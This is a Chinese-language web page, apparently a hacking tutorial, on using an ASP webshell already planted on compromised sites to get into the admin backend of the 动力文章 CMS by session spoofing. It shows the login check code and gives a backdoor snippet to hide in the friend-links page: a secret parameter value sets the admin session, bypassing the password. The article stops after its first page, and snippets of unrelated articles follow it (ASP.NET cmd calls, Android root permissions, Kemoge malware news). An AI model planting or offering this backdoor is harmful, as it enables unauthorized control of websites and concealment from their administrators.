利用ASP木马程序获取管理权限

程序|木马

    前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵,也有人只是看看,马儿放上去了过了就忘记了,也有一些朋友,当webshell的新鲜劲儿过去了后台的神秘感和诱惑力也就大大增加。
  其实,对很多功能强大的系统而言,拿到后台也就是拿到了一个好的后门了,但是现在比较新的版本的很多asp系统密码都是MD5加密然后配合严格的验证程序来验证的,但是我们就没有办法突破这些限制了吗?no!我今天就是要说怎么突破这些限制让我们直奔后台,有马儿厩是好办事,follow me............

  session欺骗篇

  首先简单说一下一般asp系统的身份验证原理。 一般来说,后台管理员在登录页面输入账号密码后,程序会拿着他提交的用户名密码去数据库的管理员表里面找,如果有这个人的账号密码就认为你是管理员,然后给你一个表示你身份的session值。或者程序先把你的用户名密码提取出来,然后到数据库的管理员表里面取出管理员的账号密码来和你提交的相比较,如果相等,就跟上面一样给你个表示你身份的sesion值。然后你进入任何一个管理页面它都要首先验证你的session值,如果是管理员就让你通过,不是的话就引导你回到登录页面或者出现一些奇奇怪怪的警告,这些都跟程序员的个人喜好有关。

  知道了原理,我们现在的一个思路就是通过我们的asp木马来修改它的程序然后拿到一个管理员session,这样的话尽管我们没有管理员密码,但是我们一样在后台通行无阻了。我把这种方法称为session欺骗。限于篇幅不能每个系统都能详细说明,本文仅以动力文章系统为例来说明。

  动力文章系统3.51,(图一)
 

图一     其实动力文章系统的所有版本全部通杀,包括动易。大家可以自己实践一下。

  我们先来看一下它的验证内容。动力文章3.51的验证页面在Admin_ChkLogin.asp,其验证内容如下:

  ............
  else
   rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
   rs("LastLoginTime")=now()
   rs("LoginTimes")=rs("LoginTimes")+1
   rs.update
   session.Timeout=SessionTimeout
   session("AdminName")=rs("username")
   rs.close
   set rs=nothing
   call CloseConn()
   Response.Redirect "Admin_Index.asp"

  前面省略号是用户名密码不正确的验证,直到else,看一下,如果用户名密码正确就给你两个session值:

  session.Timeout=SessionTimeout
  session("AdminName")=rs("username")

  我们在看一下其他管理页面是怎么验证session的,admin_index.asp一开始就这样:

  看起来似乎很严密,但是我们看一下,它这里值验证一个AdminName的session,只要我们的session内容是AdminName的话不就可以通过了?好,我们开工,先去弄到它的管理员账号再说,这个不要我教你了吧?到他网站逛一下或者直接一点下载它的数据库来看都可以知道。我们找个页面来改一下,我找一个比较没人而内容较多的页面FriendSite.asp(友情链接页面)来改,呵呵,这样管理员也很难查得出来啊。用asp木马的编辑功能来编辑一下它的内容。在他页面下隐蔽处加上下面几句话:

  dim id
  id=trim(request("qwe"))
  if id="120" then
   session("AdminName")="admin" ‘这里是假设的,实际操作中可以改成你想要得管理员账号
  end if

[1] [2] 下一页  

时间: 2024-10-03 09:39:37

利用ASP木马程序获取管理权限的相关文章

使用ASP.NET程序来管理文件或目录的一种方案

asp.net|程序 使用ASP.NET程序来管理文件或目录有多种方法,比如Directory.CreateDirectory,DirectoryInfo.Create等方法来创建一个目录,但今天我们来介绍另外一种比较另类的创建目录的方法,就是使用cmd的命令方式来管理. 在用过DOS命令的人都知道DOS命令可以做很多事,比如dir可以列举目录下的文件和子目录.这次,我们就是用ASP.NET程序来调用cmd的命令来管理文件. 下面是一段调用cmd.exe的方法: public bool cmd(

APK程序获取system权限的方法_Android

本文实例讲述了APK程序获取system权限的方法.分享给大家供大家参考.具体如下: 最近项目需要,用NDK编程,遇到了些问题,在访问底层的设备时,没有权限,后来就在网上查找了资料,一开始还以为有root权限,找来找去,弄来弄去,程序都获取不到root权限,后来找到原来用system权限就可以访问设备了.网上找到2种方法,一是在源码中编译,二是修改密钥.刚开始弄android的,对源码不了解,就选择了第二种方法. 下面是操作步骤: 1.在代码中,AndroidManifest.xml文件的man

APK程序获取system权限的方法

本文实例讲述了APK程序获取system权限的方法.分享给大家供大家参考.具体如下: 最近项目需要,用NDK编程,遇到了些问题,在访问底层的设备时,没有权限,后来就在网上查找了资料,一开始还以为有root权限,找来找去,弄来弄去,程序都获取不到root权限,后来找到原来用system权限就可以访问设备了.网上找到2种方法,一是在源码中编译,二是修改密钥.刚开始弄android的,对源码不了解,就选择了第二种方法. 下面是操作步骤: 1.在代码中,AndroidManifest.xml文件的man

如何缓解Windows应用程序本地管理权限风险?

  用户总想多安装一些Windows应用程序,但是,如果管理员真的给了用户本地管理权限,那么网络有可能面临严重的威胁,而且,由于用户安装应用程序产生的危险越多,网络安全工作就越复杂.所以,管理员在给用户本地权限的时候,应该采取一些策略,以免对网络造成安全风险. 网络安全方面的专家Brad Casey曾提出过一些相关建议,比如,如果想给最终用户自己选择安装和运行哪些应用程序的权限,管理员最好是列出一个应用程序的黑名单,告诉用户哪些应用程序不能使用.而且这个黑名单还应该是一个可扩充的公开黑名单,通过

IBM PureApplication System利用虚拟应用程序模式管理应用程序服务

IBM PureApplication System 虚拟应用程序模式是在多年的应用程序-基础架构-部署经验和最佳实践中所捕获的精华.虚拟应用程序模式封装了多个中间件元素的优化解决方案,以管理特定类型的应用程序工作负载.在本文中,作者向您介绍虚拟应用程序模式,以及它们在生态系统中的位置,描述它们的组件和功能,并提供如何创建和使用虚拟应用程序模式的基础知识. IBM® PureSystems 产品家族的推出将云计算带到新的高度.以 IBM PureApplication System 和 IBM

利用ASP.NET程序来访问Excel文档

asp.net|excel|程序|访问|来访     Excel是Microsoft公司的Office套件中的一种软件,他主要用来处理电子表格.Excel以界面友好.处理数据迅速等优点获得广大办公人员的欢迎.所以很多文档就以Excel的形式保存了下来.对于程序设计人员,在程序设计中,我们往往要访问Excel文件来获得数据.但由于Excel文件不是标准数据库,所以用程序语言来访问他就比较困难.       ASP.net是Microsoft公司极力推荐的一个产品,作为.NET Framework框

一个ASP木马程序的源代码

程序|木马|源代码 <%@ LANGUAGE = VBScript.Encode codepage ="936" %><%Server.ScriptTimeOut=5000%><object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object><object runat=s

利用ASP.NET实现分页管理器

asp.net|分页     在DataGrid的web版控件中提供了自动分页的功能,但是我从来没用过它,因为它实现的分页只是一种假相.我们为什么需要分页?那是因为符合条件的记录可能很多,如果一次读取所有的记录,不仅延长获取数据的时间,而且也极度浪费内存.而分页的存在的主要目的正是为了解决这两个问题(当然,也不排除为了UI美观的需要而使用分页的).而web版的DataGrid是怎样实现分页的了?它并没有打算解决上述两个问题,而还是一次读取所有的数据,然后以分页的样子表现出来.这是对效率和内存的极

新 Android 恶意程序获取 Root 权限卸载安全软件

FireEye Labs的安全研究人员发现了一个源自中国的Android恶意程序家族, 它正迅速传播到全世界20多个国家,它的指令控制服务器(CC)域名是aps.kemoge.net,因此被取名为Kemoge.Kemoge将合法应用 重新打包,伪装成合法应用上传到第三方应用商店,通过网站和广告宣传,用户一旦安装之后它会收集设备信息上传到广告服务器,然后用广告轰炸用户. Kemoge一开始只是恼人,但很快它会变得邪恶.它会调用一个多重加密的压缩文件,该压缩文件包含了最多8个root利用可执行工具,